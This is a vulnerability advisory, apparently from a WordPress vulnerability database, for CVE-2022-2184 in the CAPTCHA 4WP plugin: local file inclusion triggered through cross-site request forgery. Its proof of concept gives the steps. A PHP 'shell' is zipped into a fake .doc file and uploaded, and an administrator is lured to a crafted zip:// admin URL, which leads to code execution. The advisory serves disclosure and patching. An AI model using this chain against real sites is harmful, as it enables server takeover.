CAPTCHA 4WP < 7.1.0 – Local File Inclusion via CSRF | CVE 2022-2184 | Plugin Vulnerabilities

Description

The plugin lets user input reach a sensitive require_once call in one of its admin-side templates. This can be abused by attackers, via a Cross-Site Request Forgery attack to run arbitrary code on the server.

Proof of Concept

1) Create a malicious PHP script
$ echo '<?php phpinfo();' > shell.php

2) Add it to a fake .doc file, who will actually be a zip file
$ zip malicious.doc shell.php

3) While logged-in as an Author, upload the "doc" file via WP's media gallery.

4) Have an administrator visit the following URL:

httsp://example.com/wp-admin/admin.php?page=c4wp-admin-help&tab=zip://../wp-content/uploads/2022/06/malicious.doc%23shell

Affects Plugins

advanced-nocaptcha-recaptcha

Fixed in 7.1.0

References

CVE

Classification

Type

LFI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of WuHan University

Submitter

ZhongFu Su(JrXnm) of WuHan University

Submitter website

https://blog.szfszf.top

Submitter twitter

Verified

Yes

WPVDB ID

e777784f-5ba0-4966-be27-e0a0cbbfe056

Timeline

Publicly Published

2022-07-11 (about 1 years ago)

Added

2022-07-11 (about 1 years ago)

Last Updated

2023-04-11 (about 1 years ago)

Other

Published

Title

Published

2023-12-22

Title

Backup Migration < 1.4.0 - Unauthenticated Path Traversal to Arbitrary File Deletion

Published

2015-06-10

Title

History Collection <= 1.1.1 - Arbitraty File Download

Published

2018-01-10

Title

Service Finder Booking < 3.2 - Unauthenticated Local File Disclosure

Published

2024-02-23

Title

Brizy – Page Builder < 2.4.41 - Authenticated (Contributor+) Directory Traversal

Published

2014-08-01

Title

jQuery Mega Menu 1.0 - Local File Inclusion